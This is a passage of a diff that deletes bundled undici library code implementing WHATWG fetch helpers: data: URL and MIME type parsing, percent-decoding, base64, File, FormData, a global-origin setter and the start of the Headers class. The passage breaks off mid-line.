- mimeType = mimeType.slice(0, -6) - - // 5. Remove trailing U+0020 SPACE code points from mimeType, - // if any. - mimeType = mimeType.replace(/(\u0020)+$/, '') - - // 6. Remove the last U+003B (;) code point from mimeType. - mimeType = mimeType.slice(0, -1) - } - - // 12. If mimeType starts with U+003B (;), then prepend - // "text/plain" to mimeType. - if (mimeType.startsWith(';')) { - mimeType = 'text/plain' + mimeType - } - - // 13. Let mimeTypeRecord be the result of parsing - // mimeType. - let mimeTypeRecord = parseMIMEType(mimeType) - - // 14. If mimeTypeRecord is failure, then set - // mimeTypeRecord to text/plain;charset=US-ASCII. - if (mimeTypeRecord === 'failure') { - mimeTypeRecord = parseMIMEType('text/plain;charset=US-ASCII') - } - - // 15. Return a new data: URL struct whose MIME - // type is mimeTypeRecord and body is body. - // https://fetch.spec.whatwg.org/#data-url-struct - return { mimeType: mimeTypeRecord, body } -} - -// https://url.spec.whatwg.org/#concept-url-serializer -/** - * @param {URL} url - * @param {boolean} excludeFragment - */ -function URLSerializer (url, excludeFragment = false) { - if (!excludeFragment) { - return url.href - } - - const href = url.href - const hashLength = url.hash.length - - return hashLength === 0 ? href : href.substring(0, href.length - hashLength) -} - -// https://infra.spec.whatwg.org/#collect-a-sequence-of-code-points -/** - * @param {(char: string) => boolean} condition - * @param {string} input - * @param {{ position: number }} position - */ -function collectASequenceOfCodePoints (condition, input, position) { - // 1. Let result be the empty string. - let result = '' - - // 2. While position doesn’t point past the end of input and the - // code point at position within input meets the condition condition: - while (position.position < input.length && condition(input[position.position])) { - // 1. Append that code point to the end of result. - result += input[position.position] - - // 2. 
Advance position by 1. - position.position++ - } - - // 3. Return result. - return result -} - -/** - * A faster collectASequenceOfCodePoints that only works when comparing a single character. - * @param {string} char - * @param {string} input - * @param {{ position: number }} position - */ -function collectASequenceOfCodePointsFast (char, input, position) { - const idx = input.indexOf(char, position.position) - const start = position.position - - if (idx === -1) { - position.position = input.length - return input.slice(start) - } - - position.position = idx - return input.slice(start, position.position) -} - -// https://url.spec.whatwg.org/#string-percent-decode -/** @param {string} input */ -function stringPercentDecode (input) { - // 1. Let bytes be the UTF-8 encoding of input. - const bytes = encoder.encode(input) - - // 2. Return the percent-decoding of bytes. - return percentDecode(bytes) -} - -// https://url.spec.whatwg.org/#percent-decode -/** @param {Uint8Array} input */ -function percentDecode (input) { - // 1. Let output be an empty byte sequence. - /** @type {number[]} */ - const output = [] - - // 2. For each byte byte in input: - for (let i = 0; i < input.length; i++) { - const byte = input[i] - - // 1. If byte is not 0x25 (%), then append byte to output. - if (byte !== 0x25) { - output.push(byte) - - // 2. Otherwise, if byte is 0x25 (%) and the next two bytes - // after byte in input are not in the ranges - // 0x30 (0) to 0x39 (9), 0x41 (A) to 0x46 (F), - // and 0x61 (a) to 0x66 (f), all inclusive, append byte - // to output. - } else if ( - byte === 0x25 && - !/^[0-9A-Fa-f]{2}$/i.test(String.fromCharCode(input[i + 1], input[i + 2])) - ) { - output.push(0x25) - - // 3. Otherwise: - } else { - // 1. Let bytePoint be the two bytes after byte in input, - // decoded, and then interpreted as hexadecimal number. - const nextTwoBytes = String.fromCharCode(input[i + 1], input[i + 2]) - const bytePoint = Number.parseInt(nextTwoBytes, 16) - - // 2. 
Append a byte whose value is bytePoint to output. - output.push(bytePoint) - - // 3. Skip the next two bytes in input. - i += 2 - } - } - - // 3. Return output. - return Uint8Array.from(output) -} - -// https://mimesniff.spec.whatwg.org/#parse-a-mime-type -/** @param {string} input */ -function parseMIMEType (input) { - // 1. Remove any leading and trailing HTTP whitespace - // from input. - input = removeHTTPWhitespace(input, true, true) - - // 2. Let position be a position variable for input, - // initially pointing at the start of input. - const position = { position: 0 } - - // 3. Let type be the result of collecting a sequence - // of code points that are not U+002F (/) from - // input, given position. - const type = collectASequenceOfCodePointsFast( - '/', - input, - position - ) - - // 4. If type is the empty string or does not solely - // contain HTTP token code points, then return failure. - // https://mimesniff.spec.whatwg.org/#http-token-code-point - if (type.length === 0 || !HTTP_TOKEN_CODEPOINTS.test(type)) { - return 'failure' - } - - // 5. If position is past the end of input, then return - // failure - if (position.position > input.length) { - return 'failure' - } - - // 6. Advance position by 1. (This skips past U+002F (/).) - position.position++ - - // 7. Let subtype be the result of collecting a sequence of - // code points that are not U+003B (;) from input, given - // position. - let subtype = collectASequenceOfCodePointsFast( - ';', - input, - position - ) - - // 8. Remove any trailing HTTP whitespace from subtype. - subtype = removeHTTPWhitespace(subtype, false, true) - - // 9. If subtype is the empty string or does not solely - // contain HTTP token code points, then return failure. - if (subtype.length === 0 || !HTTP_TOKEN_CODEPOINTS.test(subtype)) { - return 'failure' - } - - const typeLowercase = type.toLowerCase() - const subtypeLowercase = subtype.toLowerCase() - - // 10. 
Let mimeType be a new MIME type record whose type - // is type, in ASCII lowercase, and subtype is subtype, - // in ASCII lowercase. - // https://mimesniff.spec.whatwg.org/#mime-type - const mimeType = { - type: typeLowercase, - subtype: subtypeLowercase, - /** @type {Map} */ - parameters: new Map(), - // https://mimesniff.spec.whatwg.org/#mime-type-essence - essence: `${typeLowercase}/${subtypeLowercase}` - } - - // 11. While position is not past the end of input: - while (position.position < input.length) { - // 1. Advance position by 1. (This skips past U+003B (;).) - position.position++ - - // 2. Collect a sequence of code points that are HTTP - // whitespace from input given position. - collectASequenceOfCodePoints( - // https://fetch.spec.whatwg.org/#http-whitespace - char => HTTP_WHITESPACE_REGEX.test(char), - input, - position - ) - - // 3. Let parameterName be the result of collecting a - // sequence of code points that are not U+003B (;) - // or U+003D (=) from input, given position. - let parameterName = collectASequenceOfCodePoints( - (char) => char !== ';' && char !== '=', - input, - position - ) - - // 4. Set parameterName to parameterName, in ASCII - // lowercase. - parameterName = parameterName.toLowerCase() - - // 5. If position is not past the end of input, then: - if (position.position < input.length) { - // 1. If the code point at position within input is - // U+003B (;), then continue. - if (input[position.position] === ';') { - continue - } - - // 2. Advance position by 1. (This skips past U+003D (=).) - position.position++ - } - - // 6. If position is past the end of input, then break. - if (position.position > input.length) { - break - } - - // 7. Let parameterValue be null. - let parameterValue = null - - // 8. If the code point at position within input is - // U+0022 ("), then: - if (input[position.position] === '"') { - // 1. 
Set parameterValue to the result of collecting - // an HTTP quoted string from input, given position - // and the extract-value flag. - parameterValue = collectAnHTTPQuotedString(input, position, true) - - // 2. Collect a sequence of code points that are not - // U+003B (;) from input, given position. - collectASequenceOfCodePointsFast( - ';', - input, - position - ) - - // 9. Otherwise: - } else { - // 1. Set parameterValue to the result of collecting - // a sequence of code points that are not U+003B (;) - // from input, given position. - parameterValue = collectASequenceOfCodePointsFast( - ';', - input, - position - ) - - // 2. Remove any trailing HTTP whitespace from parameterValue. - parameterValue = removeHTTPWhitespace(parameterValue, false, true) - - // 3. If parameterValue is the empty string, then continue. - if (parameterValue.length === 0) { - continue - } - } - - // 10. If all of the following are true - // - parameterName is not the empty string - // - parameterName solely contains HTTP token code points - // - parameterValue solely contains HTTP quoted-string token code points - // - mimeType’s parameters[parameterName] does not exist - // then set mimeType’s parameters[parameterName] to parameterValue. - if ( - parameterName.length !== 0 && - HTTP_TOKEN_CODEPOINTS.test(parameterName) && - (parameterValue.length === 0 || HTTP_QUOTED_STRING_TOKENS.test(parameterValue)) && - !mimeType.parameters.has(parameterName) - ) { - mimeType.parameters.set(parameterName, parameterValue) - } - } - - // 12. Return mimeType. - return mimeType -} - -// https://infra.spec.whatwg.org/#forgiving-base64-decode -/** @param {string} data */ -function forgivingBase64 (data) { - // 1. Remove all ASCII whitespace from data. - data = data.replace(/[\u0009\u000A\u000C\u000D\u0020]/g, '') // eslint-disable-line - - // 2. If data’s code point length divides by 4 leaving - // no remainder, then: - if (data.length % 4 === 0) { - // 1. 
If data ends with one or two U+003D (=) code points, - // then remove them from data. - data = data.replace(/=?=$/, '') - } - - // 3. If data’s code point length divides by 4 leaving - // a remainder of 1, then return failure. - if (data.length % 4 === 1) { - return 'failure' - } - - // 4. If data contains a code point that is not one of - // U+002B (+) - // U+002F (/) - // ASCII alphanumeric - // then return failure. - if (/[^+/0-9A-Za-z]/.test(data)) { - return 'failure' - } - - const binary = atob(data) - const bytes = new Uint8Array(binary.length) - - for (let byte = 0; byte < binary.length; byte++) { - bytes[byte] = binary.charCodeAt(byte) - } - - return bytes -} - -// https://fetch.spec.whatwg.org/#collect-an-http-quoted-string -// tests: https://fetch.spec.whatwg.org/#example-http-quoted-string -/** - * @param {string} input - * @param {{ position: number }} position - * @param {boolean?} extractValue - */ -function collectAnHTTPQuotedString (input, position, extractValue) { - // 1. Let positionStart be position. - const positionStart = position.position - - // 2. Let value be the empty string. - let value = '' - - // 3. Assert: the code point at position within input - // is U+0022 ("). - assert(input[position.position] === '"') - - // 4. Advance position by 1. - position.position++ - - // 5. While true: - while (true) { - // 1. Append the result of collecting a sequence of code points - // that are not U+0022 (") or U+005C (\) from input, given - // position, to value. - value += collectASequenceOfCodePoints( - (char) => char !== '"' && char !== '\\', - input, - position - ) - - // 2. If position is past the end of input, then break. - if (position.position >= input.length) { - break - } - - // 3. Let quoteOrBackslash be the code point at position within - // input. - const quoteOrBackslash = input[position.position] - - // 4. Advance position by 1. - position.position++ - - // 5. 
If quoteOrBackslash is U+005C (\), then: - if (quoteOrBackslash === '\\') { - // 1. If position is past the end of input, then append - // U+005C (\) to value and break. - if (position.position >= input.length) { - value += '\\' - break - } - - // 2. Append the code point at position within input to value. - value += input[position.position] - - // 3. Advance position by 1. - position.position++ - - // 6. Otherwise: - } else { - // 1. Assert: quoteOrBackslash is U+0022 ("). - assert(quoteOrBackslash === '"') - - // 2. Break. - break - } - } - - // 6. If the extract-value flag is set, then return value. - if (extractValue) { - return value - } - - // 7. Return the code points from positionStart to position, - // inclusive, within input. - return input.slice(positionStart, position.position) -} - -/** - * @see https://mimesniff.spec.whatwg.org/#serialize-a-mime-type - */ -function serializeAMimeType (mimeType) { - assert(mimeType !== 'failure') - const { parameters, essence } = mimeType - - // 1. Let serialization be the concatenation of mimeType’s - // type, U+002F (/), and mimeType’s subtype. - let serialization = essence - - // 2. For each name → value of mimeType’s parameters: - for (let [name, value] of parameters.entries()) { - // 1. Append U+003B (;) to serialization. - serialization += ';' - - // 2. Append name to serialization. - serialization += name - - // 3. Append U+003D (=) to serialization. - serialization += '=' - - // 4. If value does not solely contain HTTP token code - // points or value is the empty string, then: - if (!HTTP_TOKEN_CODEPOINTS.test(value)) { - // 1. Precede each occurence of U+0022 (") or - // U+005C (\) in value with U+005C (\). - value = value.replace(/(\\|")/g, '\\$1') - - // 2. Prepend U+0022 (") to value. - value = '"' + value - - // 3. Append U+0022 (") to value. - value += '"' - } - - // 5. Append value to serialization. - serialization += value - } - - // 3. Return serialization. 
- return serialization -} - -/** - * @see https://fetch.spec.whatwg.org/#http-whitespace - * @param {string} char - */ -function isHTTPWhiteSpace (char) { - return char === '\r' || char === '\n' || char === '\t' || char === ' ' -} - -/** - * @see https://fetch.spec.whatwg.org/#http-whitespace - * @param {string} str - */ -function removeHTTPWhitespace (str, leading = true, trailing = true) { - let lead = 0 - let trail = str.length - 1 - - if (leading) { - for (; lead < str.length && isHTTPWhiteSpace(str[lead]); lead++); - } - - if (trailing) { - for (; trail > 0 && isHTTPWhiteSpace(str[trail]); trail--); - } - - return str.slice(lead, trail + 1) -} - -/** - * @see https://infra.spec.whatwg.org/#ascii-whitespace - * @param {string} char - */ -function isASCIIWhitespace (char) { - return char === '\r' || char === '\n' || char === '\t' || char === '\f' || char === ' ' -} - -/** - * @see https://infra.spec.whatwg.org/#strip-leading-and-trailing-ascii-whitespace - */ -function removeASCIIWhitespace (str, leading = true, trailing = true) { - let lead = 0 - let trail = str.length - 1 - - if (leading) { - for (; lead < str.length && isASCIIWhitespace(str[lead]); lead++); - } - - if (trailing) { - for (; trail > 0 && isASCIIWhitespace(str[trail]); trail--); - } - - return str.slice(lead, trail + 1) -} - -module.exports = { - dataURLProcessor, - URLSerializer, - collectASequenceOfCodePoints, - collectASequenceOfCodePointsFast, - stringPercentDecode, - parseMIMEType, - collectAnHTTPQuotedString, - serializeAMimeType -} - - -/***/ }), - -/***/ 8511: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { Blob, File: NativeFile } = __nccwpck_require__(4300) -const { types } = __nccwpck_require__(3837) -const { kState } = __nccwpck_require__(5861) -const { isBlobLike } = __nccwpck_require__(2538) -const { webidl } = __nccwpck_require__(1744) -const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) -const { 
kEnumerableProperty } = __nccwpck_require__(3983) -const encoder = new TextEncoder() - -class File extends Blob { - constructor (fileBits, fileName, options = {}) { - // The File constructor is invoked with two or three parameters, depending - // on whether the optional dictionary parameter is used. When the File() - // constructor is invoked, user agents must run the following steps: - webidl.argumentLengthCheck(arguments, 2, { header: 'File constructor' }) - - fileBits = webidl.converters['sequence'](fileBits) - fileName = webidl.converters.USVString(fileName) - options = webidl.converters.FilePropertyBag(options) - - // 1. Let bytes be the result of processing blob parts given fileBits and - // options. - // Note: Blob handles this for us - - // 2. Let n be the fileName argument to the constructor. - const n = fileName - - // 3. Process FilePropertyBag dictionary argument by running the following - // substeps: - - // 1. If the type member is provided and is not the empty string, let t - // be set to the type dictionary member. If t contains any characters - // outside the range U+0020 to U+007E, then set t to the empty string - // and return from these substeps. - // 2. Convert every character in t to ASCII lowercase. - let t = options.type - let d - - // eslint-disable-next-line no-labels - substep: { - if (t) { - t = parseMIMEType(t) - - if (t === 'failure') { - t = '' - // eslint-disable-next-line no-labels - break substep - } - - t = serializeAMimeType(t).toLowerCase() - } - - // 3. If the lastModified member is provided, let d be set to the - // lastModified dictionary member. If it is not provided, set d to the - // current date and time represented as the number of milliseconds since - // the Unix Epoch (which is the equivalent of Date.now() [ECMA-262]). - d = options.lastModified - } - - // 4. Return a new File object F such that: - // F refers to the bytes byte sequence. - // F.size is set to the number of total bytes in bytes. - // F.name is set to n. 
- // F.type is set to t. - // F.lastModified is set to d. - - super(processBlobParts(fileBits, options), { type: t }) - this[kState] = { - name: n, - lastModified: d, - type: t - } - } - - get name () { - webidl.brandCheck(this, File) - - return this[kState].name - } - - get lastModified () { - webidl.brandCheck(this, File) - - return this[kState].lastModified - } - - get type () { - webidl.brandCheck(this, File) - - return this[kState].type - } -} - -class FileLike { - constructor (blobLike, fileName, options = {}) { - // TODO: argument idl type check - - // The File constructor is invoked with two or three parameters, depending - // on whether the optional dictionary parameter is used. When the File() - // constructor is invoked, user agents must run the following steps: - - // 1. Let bytes be the result of processing blob parts given fileBits and - // options. - - // 2. Let n be the fileName argument to the constructor. - const n = fileName - - // 3. Process FilePropertyBag dictionary argument by running the following - // substeps: - - // 1. If the type member is provided and is not the empty string, let t - // be set to the type dictionary member. If t contains any characters - // outside the range U+0020 to U+007E, then set t to the empty string - // and return from these substeps. - // TODO - const t = options.type - - // 2. Convert every character in t to ASCII lowercase. - // TODO - - // 3. If the lastModified member is provided, let d be set to the - // lastModified dictionary member. If it is not provided, set d to the - // current date and time represented as the number of milliseconds since - // the Unix Epoch (which is the equivalent of Date.now() [ECMA-262]). - const d = options.lastModified ?? Date.now() - - // 4. Return a new File object F such that: - // F refers to the bytes byte sequence. - // F.size is set to the number of total bytes in bytes. - // F.name is set to n. - // F.type is set to t. - // F.lastModified is set to d. 
- - this[kState] = { - blobLike, - name: n, - type: t, - lastModified: d - } - } - - stream (...args) { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.stream(...args) - } - - arrayBuffer (...args) { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.arrayBuffer(...args) - } - - slice (...args) { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.slice(...args) - } - - text (...args) { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.text(...args) - } - - get size () { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.size - } - - get type () { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.type - } - - get name () { - webidl.brandCheck(this, FileLike) - - return this[kState].name - } - - get lastModified () { - webidl.brandCheck(this, FileLike) - - return this[kState].lastModified - } - - get [Symbol.toStringTag] () { - return 'File' - } -} - -Object.defineProperties(File.prototype, { - [Symbol.toStringTag]: { - value: 'File', - configurable: true - }, - name: kEnumerableProperty, - lastModified: kEnumerableProperty -}) - -webidl.converters.Blob = webidl.interfaceConverter(Blob) - -webidl.converters.BlobPart = function (V, opts) { - if (webidl.util.Type(V) === 'Object') { - if (isBlobLike(V)) { - return webidl.converters.Blob(V, { strict: false }) - } - - if ( - ArrayBuffer.isView(V) || - types.isAnyArrayBuffer(V) - ) { - return webidl.converters.BufferSource(V, opts) - } - } - - return webidl.converters.USVString(V, opts) -} - -webidl.converters['sequence'] = webidl.sequenceConverter( - webidl.converters.BlobPart -) - -// https://www.w3.org/TR/FileAPI/#dfn-FilePropertyBag -webidl.converters.FilePropertyBag = webidl.dictionaryConverter([ - { - key: 'lastModified', - converter: webidl.converters['long long'], - get defaultValue () { - return Date.now() - } - }, - { - key: 'type', - converter: webidl.converters.DOMString, - defaultValue: '' - }, - { 
- key: 'endings', - converter: (value) => { - value = webidl.converters.DOMString(value) - value = value.toLowerCase() - - if (value !== 'native') { - value = 'transparent' - } - - return value - }, - defaultValue: 'transparent' - } -]) - -/** - * @see https://www.w3.org/TR/FileAPI/#process-blob-parts - * @param {(NodeJS.TypedArray|Blob|string)[]} parts - * @param {{ type: string, endings: string }} options - */ -function processBlobParts (parts, options) { - // 1. Let bytes be an empty sequence of bytes. - /** @type {NodeJS.TypedArray[]} */ - const bytes = [] - - // 2. For each element in parts: - for (const element of parts) { - // 1. If element is a USVString, run the following substeps: - if (typeof element === 'string') { - // 1. Let s be element. - let s = element - - // 2. If the endings member of options is "native", set s - // to the result of converting line endings to native - // of element. - if (options.endings === 'native') { - s = convertLineEndingsNative(s) - } - - // 3. Append the result of UTF-8 encoding s to bytes. - bytes.push(encoder.encode(s)) - } else if ( - types.isAnyArrayBuffer(element) || - types.isTypedArray(element) - ) { - // 2. If element is a BufferSource, get a copy of the - // bytes held by the buffer source, and append those - // bytes to bytes. - if (!element.buffer) { // ArrayBuffer - bytes.push(new Uint8Array(element)) - } else { - bytes.push( - new Uint8Array(element.buffer, element.byteOffset, element.byteLength) - ) - } - } else if (isBlobLike(element)) { - // 3. If element is a Blob, append the bytes it represents - // to bytes. - bytes.push(element) - } - } - - // 3. Return bytes. - return bytes -} - -/** - * @see https://www.w3.org/TR/FileAPI/#convert-line-endings-to-native - * @param {string} s - */ -function convertLineEndingsNative (s) { - // 1. Let native line ending be be the code point U+000A LF. - let nativeLineEnding = '\n' - - // 2. 
If the underlying platform’s conventions are to - // represent newlines as a carriage return and line feed - // sequence, set native line ending to the code point - // U+000D CR followed by the code point U+000A LF. - if (process.platform === 'win32') { - nativeLineEnding = '\r\n' - } - - return s.replace(/\r?\n/g, nativeLineEnding) -} - -// If this function is moved to ./util.js, some tools (such as -// rollup) will warn about circular dependencies. See: -// https://github.com/nodejs/undici/issues/1629 -function isFileLike (object) { - return ( - (NativeFile && object instanceof NativeFile) || - object instanceof File || ( - object && - (typeof object.stream === 'function' || - typeof object.arrayBuffer === 'function') && - object[Symbol.toStringTag] === 'File' - ) - ) -} - -module.exports = { File, FileLike, isFileLike } - - -/***/ }), - -/***/ 2015: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { isBlobLike, toUSVString, makeIterator } = __nccwpck_require__(2538) -const { kState } = __nccwpck_require__(5861) -const { File: UndiciFile, FileLike, isFileLike } = __nccwpck_require__(8511) -const { webidl } = __nccwpck_require__(1744) -const { Blob, File: NativeFile } = __nccwpck_require__(4300) - -/** @type {globalThis['File']} */ -const File = NativeFile ?? UndiciFile - -// https://xhr.spec.whatwg.org/#formdata -class FormData { - constructor (form) { - if (form !== undefined) { - throw webidl.errors.conversionFailed({ - prefix: 'FormData constructor', - argument: 'Argument 1', - types: ['undefined'] - }) - } - - this[kState] = [] - } - - append (name, value, filename = undefined) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 2, { header: 'FormData.append' }) - - if (arguments.length === 3 && !isBlobLike(value)) { - throw new TypeError( - "Failed to execute 'append' on 'FormData': parameter 2 is not of type 'Blob'" - ) - } - - // 1. Let value be value if given; otherwise blobValue. 
- - name = webidl.converters.USVString(name) - value = isBlobLike(value) - ? webidl.converters.Blob(value, { strict: false }) - : webidl.converters.USVString(value) - filename = arguments.length === 3 - ? webidl.converters.USVString(filename) - : undefined - - // 2. Let entry be the result of creating an entry with - // name, value, and filename if given. - const entry = makeEntry(name, value, filename) - - // 3. Append entry to this’s entry list. - this[kState].push(entry) - } - - delete (name) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.delete' }) - - name = webidl.converters.USVString(name) - - // The delete(name) method steps are to remove all entries whose name - // is name from this’s entry list. - this[kState] = this[kState].filter(entry => entry.name !== name) - } - - get (name) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.get' }) - - name = webidl.converters.USVString(name) - - // 1. If there is no entry whose name is name in this’s entry list, - // then return null. - const idx = this[kState].findIndex((entry) => entry.name === name) - if (idx === -1) { - return null - } - - // 2. Return the value of the first entry whose name is name from - // this’s entry list. - return this[kState][idx].value - } - - getAll (name) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.getAll' }) - - name = webidl.converters.USVString(name) - - // 1. If there is no entry whose name is name in this’s entry list, - // then return the empty list. - // 2. Return the values of all entries whose name is name, in order, - // from this’s entry list. 
- return this[kState] - .filter((entry) => entry.name === name) - .map((entry) => entry.value) - } - - has (name) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.has' }) - - name = webidl.converters.USVString(name) - - // The has(name) method steps are to return true if there is an entry - // whose name is name in this’s entry list; otherwise false. - return this[kState].findIndex((entry) => entry.name === name) !== -1 - } - - set (name, value, filename = undefined) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 2, { header: 'FormData.set' }) - - if (arguments.length === 3 && !isBlobLike(value)) { - throw new TypeError( - "Failed to execute 'set' on 'FormData': parameter 2 is not of type 'Blob'" - ) - } - - // The set(name, value) and set(name, blobValue, filename) method steps - // are: - - // 1. Let value be value if given; otherwise blobValue. - - name = webidl.converters.USVString(name) - value = isBlobLike(value) - ? webidl.converters.Blob(value, { strict: false }) - : webidl.converters.USVString(value) - filename = arguments.length === 3 - ? toUSVString(filename) - : undefined - - // 2. Let entry be the result of creating an entry with name, value, and - // filename if given. - const entry = makeEntry(name, value, filename) - - // 3. If there are entries in this’s entry list whose name is name, then - // replace the first such entry with entry and remove the others. - const idx = this[kState].findIndex((entry) => entry.name === name) - if (idx !== -1) { - this[kState] = [ - ...this[kState].slice(0, idx), - entry, - ...this[kState].slice(idx + 1).filter((entry) => entry.name !== name) - ] - } else { - // 4. Otherwise, append entry to this’s entry list. 
- this[kState].push(entry) - } - } - - entries () { - webidl.brandCheck(this, FormData) - - return makeIterator( - () => this[kState].map(pair => [pair.name, pair.value]), - 'FormData', - 'key+value' - ) - } - - keys () { - webidl.brandCheck(this, FormData) - - return makeIterator( - () => this[kState].map(pair => [pair.name, pair.value]), - 'FormData', - 'key' - ) - } - - values () { - webidl.brandCheck(this, FormData) - - return makeIterator( - () => this[kState].map(pair => [pair.name, pair.value]), - 'FormData', - 'value' - ) - } - - /** - * @param {(value: string, key: string, self: FormData) => void} callbackFn - * @param {unknown} thisArg - */ - forEach (callbackFn, thisArg = globalThis) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.forEach' }) - - if (typeof callbackFn !== 'function') { - throw new TypeError( - "Failed to execute 'forEach' on 'FormData': parameter 1 is not of type 'Function'." - ) - } - - for (const [key, value] of this) { - callbackFn.apply(thisArg, [value, key, this]) - } - } -} - -FormData.prototype[Symbol.iterator] = FormData.prototype.entries - -Object.defineProperties(FormData.prototype, { - [Symbol.toStringTag]: { - value: 'FormData', - configurable: true - } -}) - -/** - * @see https://html.spec.whatwg.org/multipage/form-control-infrastructure.html#create-an-entry - * @param {string} name - * @param {string|Blob} value - * @param {?string} filename - * @returns - */ -function makeEntry (name, value, filename) { - // 1. Set name to the result of converting name into a scalar value string. - // "To convert a string into a scalar value string, replace any surrogates - // with U+FFFD." - // see: https://nodejs.org/dist/latest-v18.x/docs/api/buffer.html#buftostringencoding-start-end - name = Buffer.from(name).toString('utf8') - - // 2. If value is a string, then set value to the result of converting - // value into a scalar value string. 
- if (typeof value === 'string') { - value = Buffer.from(value).toString('utf8') - } else { - // 3. Otherwise: - - // 1. If value is not a File object, then set value to a new File object, - // representing the same bytes, whose name attribute value is "blob" - if (!isFileLike(value)) { - value = value instanceof Blob - ? new File([value], 'blob', { type: value.type }) - : new FileLike(value, 'blob', { type: value.type }) - } - - // 2. If filename is given, then set value to a new File object, - // representing the same bytes, whose name attribute is filename. - if (filename !== undefined) { - /** @type {FilePropertyBag} */ - const options = { - type: value.type, - lastModified: value.lastModified - } - - value = (NativeFile && value instanceof NativeFile) || value instanceof UndiciFile - ? new File([value], filename, options) - : new FileLike(value, filename, options) - } - } - - // 4. Return an entry whose name is name and whose value is value. - return { name, value } -} - -module.exports = { FormData } - - -/***/ }), - -/***/ 1246: -/***/ ((module) => { - -"use strict"; - - -// In case of breaking changes, increase the version -// number to avoid conflicts. 
-const globalOrigin = Symbol.for('undici.globalOrigin.1') - -function getGlobalOrigin () { - return globalThis[globalOrigin] -} - -function setGlobalOrigin (newOrigin) { - if (newOrigin === undefined) { - Object.defineProperty(globalThis, globalOrigin, { - value: undefined, - writable: true, - enumerable: false, - configurable: false - }) - - return - } - - const parsedURL = new URL(newOrigin) - - if (parsedURL.protocol !== 'http:' && parsedURL.protocol !== 'https:') { - throw new TypeError(`Only http & https urls are allowed, received ${parsedURL.protocol}`) - } - - Object.defineProperty(globalThis, globalOrigin, { - value: parsedURL, - writable: true, - enumerable: false, - configurable: false - }) -} - -module.exports = { - getGlobalOrigin, - setGlobalOrigin -} - - -/***/ }), - -/***/ 554: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -// https://github.com/Ethan-Arrowood/undici-fetch - - - -const { kHeadersList, kConstruct } = __nccwpck_require__(2785) -const { kGuard } = __nccwpck_require__(5861) -const { kEnumerableProperty } = __nccwpck_require__(3983) -const { - makeIterator, - isValidHeaderName, - isValidHeaderValue -} = __nccwpck_require__(2538) -const { webidl } = __nccwpck_require__(1744) -const assert = __nccwpck_require__(9491) - -const kHeadersMap = Symbol('headers map') -const kHeadersSortedMap = Symbol('headers map sorted') - -/** - * @param {number} code - */ -function isHTTPWhiteSpaceCharCode (code) { - return code === 0x00a || code === 0x00d || code === 0x009 || code === 0x020 -} - -/** - * @see https://fetch.spec.whatwg.org/#concept-header-value-normalize - * @param {string} potentialValue - */ -function headerValueNormalize (potentialValue) { - // To normalize a byte sequence potentialValue, remove - // any leading and trailing HTTP whitespace bytes from - // potentialValue. 
- let i = 0; let j = potentialValue.length - - while (j > i && isHTTPWhiteSpaceCharCode(potentialValue.charCodeAt(j - 1))) --j - while (j > i && isHTTPWhiteSpaceCharCode(potentialValue.charCodeAt(i))) ++i - - return i === 0 && j === potentialValue.length ? potentialValue : potentialValue.substring(i, j) -} - -function fill (headers, object) { - // To fill a Headers object headers with a given object object, run these steps: - - // 1. If object is a sequence, then for each header in object: - // Note: webidl conversion to array has already been done. - if (Array.isArray(object)) { - for (let i = 0; i < object.length; ++i) { - const header = object[i] - // 1. If header does not contain exactly two items, then throw a TypeError. - if (header.length !== 2) { - throw webidl.errors.exception({ - header: 'Headers constructor', - message: `expected name/value pair to be length 2, found ${header.length}.` - }) - } - - // 2. Append (header’s first item, header’s second item) to headers. - appendHeader(headers, header[0], header[1]) - } - } else if (typeof object === 'object' && object !== null) { - // Note: null should throw - - // 2. Otherwise, object is a record, then for each key → value in object, - // append (key, value) to headers - const keys = Object.keys(object) - for (let i = 0; i < keys.length; ++i) { - appendHeader(headers, keys[i], object[keys[i]]) - } - } else { - throw webidl.errors.conversionFailed({ - prefix: 'Headers constructor', - argument: 'Argument 1', - types: ['sequence>', 'record'] - }) - } -} - -/** - * @see https://fetch.spec.whatwg.org/#concept-headers-append - */ -function appendHeader (headers, name, value) { - // 1. Normalize value. - value = headerValueNormalize(value) - - // 2. If name is not a header name or value is not a - // header value, then throw a TypeError. 
- if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.append', - value: name, - type: 'header name' - }) - } else if (!isValidHeaderValue(value)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.append', - value, - type: 'header value' - }) - } - - // 3. If headers’s guard is "immutable", then throw a TypeError. - // 4. Otherwise, if headers’s guard is "request" and name is a - // forbidden header name, return. - // Note: undici does not implement forbidden header names - if (headers[kGuard] === 'immutable') { - throw new TypeError('immutable') - } else if (headers[kGuard] === 'request-no-cors') { - // 5. Otherwise, if headers’s guard is "request-no-cors": - // TODO - } - - // 6. Otherwise, if headers’s guard is "response" and name is a - // forbidden response-header name, return. - - // 7. Append (name, value) to headers’s header list. - return headers[kHeadersList].append(name, value) - - // 8. If headers’s guard is "request-no-cors", then remove - // privileged no-CORS request headers from headers -} - -class HeadersList { - /** @type {[string, string][]|null} */ - cookies = null - - constructor (init) { - if (init instanceof HeadersList) { - this[kHeadersMap] = new Map(init[kHeadersMap]) - this[kHeadersSortedMap] = init[kHeadersSortedMap] - this.cookies = init.cookies === null ? null : [...init.cookies] - } else { - this[kHeadersMap] = new Map(init) - this[kHeadersSortedMap] = 